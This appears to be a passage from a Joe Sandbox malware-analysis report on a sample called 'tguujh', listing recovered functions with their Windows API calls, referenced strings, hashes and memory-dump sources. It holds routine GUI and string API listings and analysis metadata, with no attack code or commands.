                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 2ac14dec0a6d790454ae9e677235aa33f855c51e893c75657ef3bac74408185d
                                                              • Instruction ID: da5b0306bf44db57768296a03a66f94c79f307aa74fd46e783d918388ebf5b22
                                                              • Opcode Fuzzy Hash: 2ac14dec0a6d790454ae9e677235aa33f855c51e893c75657ef3bac74408185d
                                                              • Instruction Fuzzy Hash: F3113671900199FFDF24DF99D885AEE77B8FB05300F000456F912E6190D730BA82DBA2
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00CBEA29
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00CBEA5C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CBEA72
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CBEA79
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 2fd4960345213f3a3c6bfd1d918028e1b5b34bd0c5830164aae9b7dc61f3d3a1
                                                              • Instruction ID: 7ebd71e87af98fe8f44fa7cc11908b2909506a006e3e01e23dd4ad7b1ac6167d
                                                              • Opcode Fuzzy Hash: 2fd4960345213f3a3c6bfd1d918028e1b5b34bd0c5830164aae9b7dc61f3d3a1
                                                              • Instruction Fuzzy Hash: 5E110476904298BFC711EFA89C45BEF7FADAB45320F00421AF825E7390D2748E0497B1
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CE8792
                                                              • ScreenToClient.USER32(?,?), ref: 00CE87AA
                                                              • ScreenToClient.USER32(?,?), ref: 00CE87CE
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE87E9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: 70ce92bab74562a3ec528fafa3af737f423e925392be2510d744f00466a259c9
                                                              • Instruction ID: e66d4148383ed6548ada3a658f87d80eccf41f36dcc315b48fa32a1eda930fb7
                                                              • Opcode Fuzzy Hash: 70ce92bab74562a3ec528fafa3af737f423e925392be2510d744f00466a259c9
                                                              • Instruction Fuzzy Hash: 831142B9D00249EFDB41CFA9C884AEEBBF9FB08310F108166E925E7210D735AA54CF50
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00C5216C
                                                              • SetTextColor.GDI32(?,?), ref: 00C52176
                                                              • SetBkMode.GDI32(?,00000001), ref: 00C52189
                                                              • GetStockObject.GDI32(00000005), ref: 00C52191
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Color$ModeObjectStockText
                                                              • String ID:
                                                              • API String ID: 4037423528-0
                                                              • Opcode ID: c9bd655694521619b06a53c9ddcd66861f751b45720fbfa0a7ce92c629b4891b
                                                              • Instruction ID: ce87400293bc231d6e71796ccb929e5c05251e615d030ef9143dbd967b891904
                                                              • Opcode Fuzzy Hash: c9bd655694521619b06a53c9ddcd66861f751b45720fbfa0a7ce92c629b4891b
                                                              • Instruction Fuzzy Hash: B9E06D322406C0AEDB215B74AC49BED7B61AB12336F048219F6BB4C0E0C37287409B20
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00CAEBD6
                                                              • GetDC.USER32(00000000), ref: 00CAEBE0
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEC00
                                                              • ReleaseDC.USER32(?), ref: 00CAEC21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: f20b5ae8c0bf5523e84a91490e0ef81fb512b1f7f4fe87db9611fbe781d71b0e
                                                              • Instruction ID: a4bdb75d95efcb246823e11978f952369b71157a94237b6beaa445a3dfe1b619
                                                              • Opcode Fuzzy Hash: f20b5ae8c0bf5523e84a91490e0ef81fb512b1f7f4fe87db9611fbe781d71b0e
                                                              • Instruction Fuzzy Hash: 86E01AB4800245DFCF50AFA19888B6DBBB5FB48311F14884AF90BAB210CB398941EF14
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00CAEBEA
                                                              • GetDC.USER32(00000000), ref: 00CAEBF4
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEC00
                                                              • ReleaseDC.USER32(?), ref: 00CAEC21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 05783e6be87e367c942b1d2b6060770dd83579abeb4f0c2b8bf8700bc946c639
                                                              • Instruction ID: ed256c7e9d61d8fd49730245fbd768c8ff79ff23ce2a1c20b8b7cfe915379c6e
                                                              • Opcode Fuzzy Hash: 05783e6be87e367c942b1d2b6060770dd83579abeb4f0c2b8bf8700bc946c639
                                                              • Instruction Fuzzy Hash: 95E01AB4800244DFCF509FB0888876DBBB5BB48311F14884AF90AAB210CB395901DF00
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00C7E69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 8df711b1e36c606a7c8c7e614006153e29d7fd6f7cbadd5700a7ad97b5e3fd78
                                                              • Instruction ID: 3b408528b01d7674102fa7d73ae22208a86ce9a32625f0b7d91b6157e8ce14f3
                                                              • Opcode Fuzzy Hash: 8df711b1e36c606a7c8c7e614006153e29d7fd6f7cbadd5700a7ad97b5e3fd78
                                                              • Instruction Fuzzy Hash: 10518E6290810596CB15B714DD0537E2BA4AB54704FB0C9D8F0B9866F8EF348E9ADB4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: e6c0d6717d93c01d37cdd8946756a964bd984a1837b77b51a08a6f58be183b1f
                                                              • Instruction ID: c5c67acc246e5ef307ebeb7e4536ba8c828d849aa1150b9fbc70f78dc7b0c476
                                                              • Opcode Fuzzy Hash: e6c0d6717d93c01d37cdd8946756a964bd984a1837b77b51a08a6f58be183b1f
                                                              • Instruction Fuzzy Hash: 18514535504247DFDF25DF28D4A06FABBA4EF1A314F244055ECA1AB2D0DB349E4ACB61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper_wcslen
                                                              • String ID: CALLARGARRAY
                                                              • API String ID: 157775604-1150593374
                                                              • Opcode ID: 3db4fedeb09d08510bc5f272414e406b1bb8fa48399622dbc17ac900f52ce886
                                                              • Instruction ID: 7eecdae9bc59bef168ea8c340d1541a1cb88e566f3fbf96f007c190213d2f92e
                                                              • Opcode Fuzzy Hash: 3db4fedeb09d08510bc5f272414e406b1bb8fa48399622dbc17ac900f52ce886
                                                              • Instruction Fuzzy Hash: F6419071A002199FCF04EFA9C8819EEBBB5FF58324F14402AE916A7352DB709D81DF90
                                                              APIs
                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CE4F7E
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE4F93
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: ee2d32905dc17e22bd27f4e4073120d2c3a61ff00c4130000afa7dc0b20c9846
                                                              • Instruction ID: 34618c4d4c8aa6b1b712691e747f5f4579ce3ec04465bd74083d717c3665e949
                                                              • Opcode Fuzzy Hash: ee2d32905dc17e22bd27f4e4073120d2c3a61ff00c4130000afa7dc0b20c9846
                                                              • Instruction Fuzzy Hash: F5312C74A013499FDB18CFAAC881BDABBB5FF49704F10416AE915AB391D770A941CF90
                                                              APIs
                                                                • Part of subcall function 00C5771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C57759
                                                                • Part of subcall function 00C5771B: GetStockObject.GDI32(00000011), ref: 00C5776D
                                                                • Part of subcall function 00C5771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C57777
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CE40D9
                                                              • GetSysColor.USER32(00000012), ref: 00CE40F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 138dfa589f83e0d08282a40003c330262af4b6acb2decaa39fa7e64379eedb3d
                                                              • Instruction ID: e58c1586fba2f8e62e18c51fad0ccfc1ace63532a594e00bda759ee79b40d8a6
                                                              • Opcode Fuzzy Hash: 138dfa589f83e0d08282a40003c330262af4b6acb2decaa39fa7e64379eedb3d
                                                              • Instruction Fuzzy Hash: D1112672610249AFDF01DFA9CC46AFE7BB8FB08314F004924F956E7250E675E891EB60
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CB25DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: 5355843bcc86b75863517a9eaa331029f91541998dc4189979c5d602f5eea546
                                                              • Instruction ID: 8f943a58b6542791412a079d76216d174d493ec597169b18811262d9148668fa
                                                              • Opcode Fuzzy Hash: 5355843bcc86b75863517a9eaa331029f91541998dc4189979c5d602f5eea546
                                                              • Instruction Fuzzy Hash: D9012875604119ABCF24EBA4CC51DFE7775AF56310F040609B873972D7EE309D4CA660
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CB24D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: 97463f134fdad43f5c49ab0ec3d785f3d1b19dceb29f31f762db207e8d09f7d2
                                                              • Instruction ID: c78850c6ffed5e486e17dc7557e66f31e3b2a39e1e8b34d78228e84fa773a482
                                                              • Opcode Fuzzy Hash: 97463f134fdad43f5c49ab0ec3d785f3d1b19dceb29f31f762db207e8d09f7d2
                                                              • Instruction Fuzzy Hash: B201F275A04109ABCB28FBA0CD52EFF7BB89F15300F140019A802672C7DA209E0CEA71
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CB2558
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: f97c31b2c5dc8dff1f2ba63336dd164a7ed53ded3106d93d31a4a1e469d4b115
                                                              • Instruction ID: 5e6ca85cbfacf23c181826950d2c1d3965b713b916112b09c92d2a92efba8a1a
                                                              • Opcode Fuzzy Hash: f97c31b2c5dc8dff1f2ba63336dd164a7ed53ded3106d93d31a4a1e469d4b115
                                                              • Instruction Fuzzy Hash: C101FD75A00109ABCB25EBA4CA12EFFBBA89B15700F140015B802A7286EA20DF0CA671
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00CB2663
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: eff37998f0b7417e51da8629ac81db230a733642a3fc101e5ee70f88635537da
                                                              • Instruction ID: 5597f9bbaa8612b82dc8f1e7fa3ff22e216d6815ac61d778f671848d9f5abc10
                                                              • Opcode Fuzzy Hash: eff37998f0b7417e51da8629ac81db230a733642a3fc101e5ee70f88635537da
                                                              • Instruction Fuzzy Hash: 9CF0F475A44619AACB24E7A49C52FFF7B78AF00710F040A15B822A72C7DF609D0C9264
                                                              APIs
                                                                • Part of subcall function 00C6FAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C71102,?,?,?,00C5100A), ref: 00C6FAE7
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00C5100A), ref: 00C71106
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C5100A), ref: 00C71115
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C71110
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 55579361-631824599
                                                              • Opcode ID: 90b4e80c1b93a6660592089e29094b968d8d3bc495edb318d0aaf0ce6cde13c6
                                                              • Instruction ID: 5e1c0db87386b5bc06c522c1d4d6cc0d7a01fa4421f5d433e297fec70c1f6ece
                                                              • Opcode Fuzzy Hash: 90b4e80c1b93a6660592089e29094b968d8d3bc495edb318d0aaf0ce6cde13c6
                                                              • Instruction Fuzzy Hash: D5E092B06003408BD770DF28E84435ABBF4AF04700F54CD6CED8ACA292E7B4D884DBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE2C8B
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CE2C9E
  • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f4495e004a11020d10e21caab99d772b566d2c7eca8a3711012da2e59039d96f
• Instruction ID: 6af8b187f77b19e0e43ea71560cb300aa1aa2e1c7dd7cabcaae0747bb66f7f1f
• Opcode Fuzzy Hash: f4495e004a11020d10e21caab99d772b566d2c7eca8a3711012da2e59039d96f
• Instruction Fuzzy Hash: 71D0123A3C9390BBF668B770EC4FFDE6A54AB50B10F100C15774AAE1D0C9E06841C664
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE2CCB
• PostMessageW.USER32(00000000), ref: 00CE2CD2
  • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 3f18a3be55fc57304e0b3c57061117a9e19ec580f44c6320198219bb1bb76351
• Instruction ID: 9c42b03f529faf375ea7bcd1d15001aacbcb90803baf154ddf8679e18e35d8a6
• Opcode Fuzzy Hash: 3f18a3be55fc57304e0b3c57061117a9e19ec580f44c6320198219bb1bb76351
• Instruction Fuzzy Hash: EED012363C53907FF668B770EC4FFCE6A54AB54B10F500C157746AE1D0C9E06841C668
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C8C233
• GetLastError.KERNEL32 ref: 00C8C241
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8C29C
Memory Dump Source
